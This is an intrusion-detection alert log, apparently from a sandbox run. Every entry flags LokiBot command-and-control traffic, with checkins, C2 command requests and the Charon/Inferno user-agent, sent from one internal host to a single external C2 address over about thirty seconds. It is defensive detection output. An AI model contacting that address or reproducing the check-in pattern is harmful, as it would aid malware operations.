11/25/21-10:48:46.527621	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49908	80	192.168.11.20	176.223.209.128
11/25/21-10:48:47.107853	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49909	80	192.168.11.20	176.223.209.128
11/25/21-10:48:47.107853	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49909	80	192.168.11.20	176.223.209.128
11/25/21-10:48:47.107853	TCP	2025381	ET TROJAN LokiBot Checkin	49909	80	192.168.11.20	176.223.209.128
11/25/21-10:48:47.107853	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49909	80	192.168.11.20	176.223.209.128
11/25/21-10:48:47.685832	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49911	80	192.168.11.20	176.223.209.128
11/25/21-10:48:47.685832	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49911	80	192.168.11.20	176.223.209.128
11/25/21-10:48:47.685832	TCP	2025381	ET TROJAN LokiBot Checkin	49911	80	192.168.11.20	176.223.209.128
11/25/21-10:48:47.685832	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49911	80	192.168.11.20	176.223.209.128
11/25/21-10:48:48.224670	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49912	80	192.168.11.20	176.223.209.128
11/25/21-10:48:48.224670	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49912	80	192.168.11.20	176.223.209.128
11/25/21-10:48:48.224670	TCP	2025381	ET TROJAN LokiBot Checkin	49912	80	192.168.11.20	176.223.209.128
11/25/21-10:48:48.224670	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49912	80	192.168.11.20	176.223.209.128
11/25/21-10:48:48.828094	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49913	80	192.168.11.20	176.223.209.128
11/25/21-10:48:48.828094	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49913	80	192.168.11.20	176.223.209.128
11/25/21-10:48:48.828094	TCP	2025381	ET TROJAN LokiBot Checkin	49913	80	192.168.11.20	176.223.209.128
11/25/21-10:48:48.828094	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49913	80	192.168.11.20	176.223.209.128
11/25/21-10:48:49.359585	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49914	80	192.168.11.20	176.223.209.128
11/25/21-10:48:49.359585	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49914	80	192.168.11.20	176.223.209.128
11/25/21-10:48:49.359585	TCP	2025381	ET TROJAN LokiBot Checkin	49914	80	192.168.11.20	176.223.209.128
11/25/21-10:48:49.359585	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49914	80	192.168.11.20	176.223.209.128
11/25/21-10:48:49.936381	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49915	80	192.168.11.20	176.223.209.128
11/25/21-10:48:49.936381	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49915	80	192.168.11.20	176.223.209.128
11/25/21-10:48:49.936381	TCP	2025381	ET TROJAN LokiBot Checkin	49915	80	192.168.11.20	176.223.209.128
11/25/21-10:48:49.936381	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49915	80	192.168.11.20	176.223.209.128
11/25/21-10:48:50.496916	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49916	80	192.168.11.20	176.223.209.128
11/25/21-10:48:50.496916	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49916	80	192.168.11.20	176.223.209.128
11/25/21-10:48:50.496916	TCP	2025381	ET TROJAN LokiBot Checkin	49916	80	192.168.11.20	176.223.209.128
11/25/21-10:48:50.496916	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49916	80	192.168.11.20	176.223.209.128
11/25/21-10:48:51.019889	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49917	80	192.168.11.20	176.223.209.128
11/25/21-10:48:51.019889	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49917	80	192.168.11.20	176.223.209.128
11/25/21-10:48:51.019889	TCP	2025381	ET TROJAN LokiBot Checkin	49917	80	192.168.11.20	176.223.209.128
11/25/21-10:48:51.019889	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49917	80	192.168.11.20	176.223.209.128
11/25/21-10:48:51.567286	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49918	80	192.168.11.20	176.223.209.128
11/25/21-10:48:51.567286	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49918	80	192.168.11.20	176.223.209.128
11/25/21-10:48:51.567286	TCP	2025381	ET TROJAN LokiBot Checkin	49918	80	192.168.11.20	176.223.209.128
11/25/21-10:48:51.567286	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49918	80	192.168.11.20	176.223.209.128
11/25/21-10:48:52.111718	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49919	80	192.168.11.20	176.223.209.128
11/25/21-10:48:52.111718	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49919	80	192.168.11.20	176.223.209.128
11/25/21-10:48:52.111718	TCP	2025381	ET TROJAN LokiBot Checkin	49919	80	192.168.11.20	176.223.209.128
11/25/21-10:48:52.111718	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49919	80	192.168.11.20	176.223.209.128
11/25/21-10:48:52.644466	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49920	80	192.168.11.20	176.223.209.128
11/25/21-10:48:52.644466	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49920	80	192.168.11.20	176.223.209.128
11/25/21-10:48:52.644466	TCP	2025381	ET TROJAN LokiBot Checkin	49920	80	192.168.11.20	176.223.209.128
11/25/21-10:48:52.644466	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49920	80	192.168.11.20	176.223.209.128
11/25/21-10:48:53.244344	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49921	80	192.168.11.20	176.223.209.128
11/25/21-10:48:53.244344	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49921	80	192.168.11.20	176.223.209.128
11/25/21-10:48:53.244344	TCP	2025381	ET TROJAN LokiBot Checkin	49921	80	192.168.11.20	176.223.209.128
11/25/21-10:48:53.244344	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49921	80	192.168.11.20	176.223.209.128
11/25/21-10:48:53.818084	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49922	80	192.168.11.20	176.223.209.128
11/25/21-10:48:53.818084	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49922	80	192.168.11.20	176.223.209.128
11/25/21-10:48:53.818084	TCP	2025381	ET TROJAN LokiBot Checkin	49922	80	192.168.11.20	176.223.209.128
11/25/21-10:48:53.818084	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49922	80	192.168.11.20	176.223.209.128
11/25/21-10:48:54.400388	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49923	80	192.168.11.20	176.223.209.128
11/25/21-10:48:54.400388	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49923	80	192.168.11.20	176.223.209.128
11/25/21-10:48:54.400388	TCP	2025381	ET TROJAN LokiBot Checkin	49923	80	192.168.11.20	176.223.209.128
11/25/21-10:48:54.400388	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49923	80	192.168.11.20	176.223.209.128
11/25/21-10:48:54.951317	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49924	80	192.168.11.20	176.223.209.128
11/25/21-10:48:54.951317	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49924	80	192.168.11.20	176.223.209.128
11/25/21-10:48:54.951317	TCP	2025381	ET TROJAN LokiBot Checkin	49924	80	192.168.11.20	176.223.209.128
11/25/21-10:48:54.951317	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49924	80	192.168.11.20	176.223.209.128
11/25/21-10:48:55.484489	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49925	80	192.168.11.20	176.223.209.128
11/25/21-10:48:55.484489	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49925	80	192.168.11.20	176.223.209.128
11/25/21-10:48:55.484489	TCP	2025381	ET TROJAN LokiBot Checkin	49925	80	192.168.11.20	176.223.209.128
11/25/21-10:48:55.484489	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49925	80	192.168.11.20	176.223.209.128
11/25/21-10:48:56.007948	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49926	80	192.168.11.20	176.223.209.128
11/25/21-10:48:56.007948	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49926	80	192.168.11.20	176.223.209.128
11/25/21-10:48:56.007948	TCP	2025381	ET TROJAN LokiBot Checkin	49926	80	192.168.11.20	176.223.209.128
11/25/21-10:48:56.007948	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49926	80	192.168.11.20	176.223.209.128
11/25/21-10:48:56.507759	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49927	80	192.168.11.20	176.223.209.128
11/25/21-10:48:56.507759	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49927	80	192.168.11.20	176.223.209.128
11/25/21-10:48:56.507759	TCP	2025381	ET TROJAN LokiBot Checkin	49927	80	192.168.11.20	176.223.209.128
11/25/21-10:48:56.507759	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49927	80	192.168.11.20	176.223.209.128
11/25/21-10:48:57.040797	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49928	80	192.168.11.20	176.223.209.128
11/25/21-10:48:57.040797	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49928	80	192.168.11.20	176.223.209.128
11/25/21-10:48:57.040797	TCP	2025381	ET TROJAN LokiBot Checkin	49928	80	192.168.11.20	176.223.209.128
11/25/21-10:48:57.040797	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49928	80	192.168.11.20	176.223.209.128
11/25/21-10:48:57.544069	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49929	80	192.168.11.20	176.223.209.128
11/25/21-10:48:57.544069	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49929	80	192.168.11.20	176.223.209.128
11/25/21-10:48:57.544069	TCP	2025381	ET TROJAN LokiBot Checkin	49929	80	192.168.11.20	176.223.209.128
11/25/21-10:48:57.544069	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49929	80	192.168.11.20	176.223.209.128
11/25/21-10:48:58.081848	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49930	80	192.168.11.20	176.223.209.128
11/25/21-10:48:58.081848	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49930	80	192.168.11.20	176.223.209.128
11/25/21-10:48:58.081848	TCP	2025381	ET TROJAN LokiBot Checkin	49930	80	192.168.11.20	176.223.209.128
11/25/21-10:48:58.081848	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49930	80	192.168.11.20	176.223.209.128
11/25/21-10:48:58.604842	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49931	80	192.168.11.20	176.223.209.128
11/25/21-10:48:58.604842	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49931	80	192.168.11.20	176.223.209.128
11/25/21-10:48:58.604842	TCP	2025381	ET TROJAN LokiBot Checkin	49931	80	192.168.11.20	176.223.209.128
11/25/21-10:48:58.604842	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49931	80	192.168.11.20	176.223.209.128
11/25/21-10:48:59.185834	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49932	80	192.168.11.20	176.223.209.128
11/25/21-10:48:59.185834	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49932	80	192.168.11.20	176.223.209.128
11/25/21-10:48:59.185834	TCP	2025381	ET TROJAN LokiBot Checkin	49932	80	192.168.11.20	176.223.209.128
11/25/21-10:48:59.185834	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49932	80	192.168.11.20	176.223.209.128
11/25/21-10:48:59.754447	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49933	80	192.168.11.20	176.223.209.128
11/25/21-10:48:59.754447	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49933	80	192.168.11.20	176.223.209.128
11/25/21-10:48:59.754447	TCP	2025381	ET TROJAN LokiBot Checkin	49933	80	192.168.11.20	176.223.209.128
11/25/21-10:48:59.754447	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49933	80	192.168.11.20	176.223.209.128
11/25/21-10:49:00.325952	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49934	80	192.168.11.20	176.223.209.128
11/25/21-10:49:00.325952	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49934	80	192.168.11.20	176.223.209.128
11/25/21-10:49:00.325952	TCP	2025381	ET TROJAN LokiBot Checkin	49934	80	192.168.11.20	176.223.209.128
11/25/21-10:49:00.325952	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49934	80	192.168.11.20	176.223.209.128
11/25/21-10:49:00.885502	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49935	80	192.168.11.20	176.223.209.128
11/25/21-10:49:00.885502	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49935	80	192.168.11.20	176.223.209.128
11/25/21-10:49:00.885502	TCP	2025381	ET TROJAN LokiBot Checkin	49935	80	192.168.11.20	176.223.209.128
11/25/21-10:49:00.885502	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49935	80	192.168.11.20	176.223.209.128
11/25/21-10:49:01.341393	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49936	80	192.168.11.20	176.223.209.128
11/25/21-10:49:01.341393	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49936	80	192.168.11.20	176.223.209.128
11/25/21-10:49:01.341393	TCP	2025381	ET TROJAN LokiBot Checkin	49936	80	192.168.11.20	176.223.209.128
11/25/21-10:49:01.341393	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49936	80	192.168.11.20	176.223.209.128
11/25/21-10:49:01.916305	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49937	80	192.168.11.20	176.223.209.128
11/25/21-10:49:01.916305	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49937	80	192.168.11.20	176.223.209.128
11/25/21-10:49:01.916305	TCP	2025381	ET TROJAN LokiBot Checkin	49937	80	192.168.11.20	176.223.209.128
11/25/21-10:49:01.916305	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49937	80	192.168.11.20	176.223.209.128
11/25/21-10:49:02.470140	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49938	80	192.168.11.20	176.223.209.128
11/25/21-10:49:02.470140	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49938	80	192.168.11.20	176.223.209.128
11/25/21-10:49:02.470140	TCP	2025381	ET TROJAN LokiBot Checkin	49938	80	192.168.11.20	176.223.209.128
11/25/21-10:49:02.470140	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49938	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.002783	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49939	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.002783	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49939	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.002783	TCP	2025381	ET TROJAN LokiBot Checkin	49939	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.002783	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49939	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.489951	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49940	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.489951	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49940	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.489951	TCP	2025381	ET TROJAN LokiBot Checkin	49940	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.489951	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49940	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.973710	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49941	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.973710	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49941	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.973710	TCP	2025381	ET TROJAN LokiBot Checkin	49941	80	192.168.11.20	176.223.209.128
11/25/21-10:49:03.973710	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49941	80	192.168.11.20	176.223.209.128
11/25/21-10:49:04.469326	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49942	80	192.168.11.20	176.223.209.128
11/25/21-10:49:04.469326	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49942	80	192.168.11.20	176.223.209.128
11/25/21-10:49:04.469326	TCP	2025381	ET TROJAN LokiBot Checkin	49942	80	192.168.11.20	176.223.209.128
11/25/21-10:49:04.469326	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49942	80	192.168.11.20	176.223.209.128
11/25/21-10:49:05.006357	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49943	80	192.168.11.20	176.223.209.128
11/25/21-10:49:05.006357	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49943	80	192.168.11.20	176.223.209.128
11/25/21-10:49:05.006357	TCP	2025381	ET TROJAN LokiBot Checkin	49943	80	192.168.11.20	176.223.209.128
11/25/21-10:49:05.006357	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49943	80	192.168.11.20	176.223.209.128
11/25/21-10:49:05.526807	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49944	80	192.168.11.20	176.223.209.128
11/25/21-10:49:05.526807	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49944	80	192.168.11.20	176.223.209.128
11/25/21-10:49:05.526807	TCP	2025381	ET TROJAN LokiBot Checkin	49944	80	192.168.11.20	176.223.209.128
11/25/21-10:49:05.526807	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49944	80	192.168.11.20	176.223.209.128
11/25/21-10:49:06.029714	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49948	80	192.168.11.20	176.223.209.128
11/25/21-10:49:06.029714	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49948	80	192.168.11.20	176.223.209.128
11/25/21-10:49:06.029714	TCP	2025381	ET TROJAN LokiBot Checkin	49948	80	192.168.11.20	176.223.209.128
11/25/21-10:49:06.029714	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49948	80	192.168.11.20	176.223.209.128
11/25/21-10:49:06.509232	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49949	80	192.168.11.20	176.223.209.128
11/25/21-10:49:06.509232	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49949	80	192.168.11.20	176.223.209.128
11/25/21-10:49:06.509232	TCP	2025381	ET TROJAN LokiBot Checkin	49949	80	192.168.11.20	176.223.209.128
11/25/21-10:49:06.509232	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49949	80	192.168.11.20	176.223.209.128
11/25/21-10:49:07.028730	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49950	80	192.168.11.20	176.223.209.128
11/25/21-10:49:07.028730	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49950	80	192.168.11.20	176.223.209.128
11/25/21-10:49:07.028730	TCP	2025381	ET TROJAN LokiBot Checkin	49950	80	192.168.11.20	176.223.209.128
11/25/21-10:49:07.028730	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49950	80	192.168.11.20	176.223.209.128
11/25/21-10:49:07.550027	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49951	80	192.168.11.20	176.223.209.128
11/25/21-10:49:07.550027	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49951	80	192.168.11.20	176.223.209.128
11/25/21-10:49:07.550027	TCP	2025381	ET TROJAN LokiBot Checkin	49951	80	192.168.11.20	176.223.209.128
11/25/21-10:49:07.550027	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49951	80	192.168.11.20	176.223.209.128
11/25/21-10:49:08.046702	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49952	80	192.168.11.20	176.223.209.128
11/25/21-10:49:08.046702	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49952	80	192.168.11.20	176.223.209.128
11/25/21-10:49:08.046702	TCP	2025381	ET TROJAN LokiBot Checkin	49952	80	192.168.11.20	176.223.209.128
11/25/21-10:49:08.046702	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49952	80	192.168.11.20	176.223.209.128
11/25/21-10:49:08.502494	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49953	80	192.168.11.20	176.223.209.128
11/25/21-10:49:08.502494	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49953	80	192.168.11.20	176.223.209.128
11/25/21-10:49:08.502494	TCP	2025381	ET TROJAN LokiBot Checkin	49953	80	192.168.11.20	176.223.209.128
11/25/21-10:49:08.502494	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49953	80	192.168.11.20	176.223.209.128
11/25/21-10:49:09.053477	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49954	80	192.168.11.20	176.223.209.128
11/25/21-10:49:09.053477	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49954	80	192.168.11.20	176.223.209.128
11/25/21-10:49:09.053477	TCP	2025381	ET TROJAN LokiBot Checkin	49954	80	192.168.11.20	176.223.209.128
11/25/21-10:49:09.053477	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49954	80	192.168.11.20	176.223.209.128
11/25/21-10:49:09.583942	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49955	80	192.168.11.20	176.223.209.128
11/25/21-10:49:09.583942	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49955	80	192.168.11.20	176.223.209.128
11/25/21-10:49:09.583942	TCP	2025381	ET TROJAN LokiBot Checkin	49955	80	192.168.11.20	176.223.209.128
11/25/21-10:49:09.583942	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49955	80	192.168.11.20	176.223.209.128
11/25/21-10:49:10.109387	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49956	80	192.168.11.20	176.223.209.128
11/25/21-10:49:10.109387	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49956	80	192.168.11.20	176.223.209.128
11/25/21-10:49:10.109387	TCP	2025381	ET TROJAN LokiBot Checkin	49956	80	192.168.11.20	176.223.209.128
11/25/21-10:49:10.109387	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49956	80	192.168.11.20	176.223.209.128
11/25/21-10:49:10.657392	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49957	80	192.168.11.20	176.223.209.128
11/25/21-10:49:10.657392	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49957	80	192.168.11.20	176.223.209.128
11/25/21-10:49:10.657392	TCP	2025381	ET TROJAN LokiBot Checkin	49957	80	192.168.11.20	176.223.209.128
11/25/21-10:49:10.657392	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49957	80	192.168.11.20	176.223.209.128
11/25/21-10:49:11.180607	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49958	80	192.168.11.20	176.223.209.128
11/25/21-10:49:11.180607	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49958	80	192.168.11.20	176.223.209.128
11/25/21-10:49:11.180607	TCP	2025381	ET TROJAN LokiBot Checkin	49958	80	192.168.11.20	176.223.209.128
11/25/21-10:49:11.180607	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49958	80	192.168.11.20	176.223.209.128
11/25/21-10:49:11.643885	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49959	80	192.168.11.20	176.223.209.128
11/25/21-10:49:11.643885	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49959	80	192.168.11.20	176.223.209.128
11/25/21-10:49:11.643885	TCP	2025381	ET TROJAN LokiBot Checkin	49959	80	192.168.11.20	176.223.209.128
11/25/21-10:49:11.643885	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49959	80	192.168.11.20	176.223.209.128
11/25/21-10:49:12.083953	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49960	80	192.168.11.20	176.223.209.128
11/25/21-10:49:12.083953	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49960	80	192.168.11.20	176.223.209.128
11/25/21-10:49:12.083953	TCP	2025381	ET TROJAN LokiBot Checkin	49960	80	192.168.11.20	176.223.209.128
11/25/21-10:49:12.083953	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49960	80	192.168.11.20	176.223.209.128
11/25/21-10:49:12.560857	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49961	80	192.168.11.20	176.223.209.128
11/25/21-10:49:12.560857	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49961	80	192.168.11.20	176.223.209.128
11/25/21-10:49:12.560857	TCP	2025381	ET TROJAN LokiBot Checkin	49961	80	192.168.11.20	176.223.209.128
11/25/21-10:49:12.560857	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49961	80	192.168.11.20	176.223.209.128
11/25/21-10:49:13.092995	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49962	80	192.168.11.20	176.223.209.128
11/25/21-10:49:13.092995	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49962	80	192.168.11.20	176.223.209.128
11/25/21-10:49:13.092995	TCP	2025381	ET TROJAN LokiBot Checkin	49962	80	192.168.11.20	176.223.209.128
11/25/21-10:49:13.092995	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49962	80	192.168.11.20	176.223.209.128
11/25/21-10:49:13.622408	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49964	80	192.168.11.20	176.223.209.128
11/25/21-10:49:13.622408	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49964	80	192.168.11.20	176.223.209.128
11/25/21-10:49:13.622408	TCP	2025381	ET TROJAN LokiBot Checkin	49964	80	192.168.11.20	176.223.209.128
11/25/21-10:49:13.622408	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49964	80	192.168.11.20	176.223.209.128
11/25/21-10:49:14.137401	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49965	80	192.168.11.20	176.223.209.128
11/25/21-10:49:14.137401	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49965	80	192.168.11.20	176.223.209.128
11/25/21-10:49:14.137401	TCP	2025381	ET TROJAN LokiBot Checkin	49965	80	192.168.11.20	176.223.209.128
11/25/21-10:49:14.137401	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49965	80	192.168.11.20	176.223.209.128
11/25/21-10:49:14.671375	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49966	80	192.168.11.20	176.223.209.128
11/25/21-10:49:14.671375	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49966	80	192.168.11.20	176.223.209.128
11/25/21-10:49:14.671375	TCP	2025381	ET TROJAN LokiBot Checkin	49966	80	192.168.11.20	176.223.209.128
11/25/21-10:49:14.671375	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49966	80	192.168.11.20	176.223.209.128
11/25/21-10:49:15.151567	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49967	80	192.168.11.20	176.223.209.128
11/25/21-10:49:15.151567	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49967	80	192.168.11.20	176.223.209.128
11/25/21-10:49:15.151567	TCP	2025381	ET TROJAN LokiBot Checkin	49967	80	192.168.11.20	176.223.209.128
11/25/21-10:49:15.151567	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49967	80	192.168.11.20	176.223.209.128
11/25/21-10:49:15.668863	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49968	80	192.168.11.20	176.223.209.128
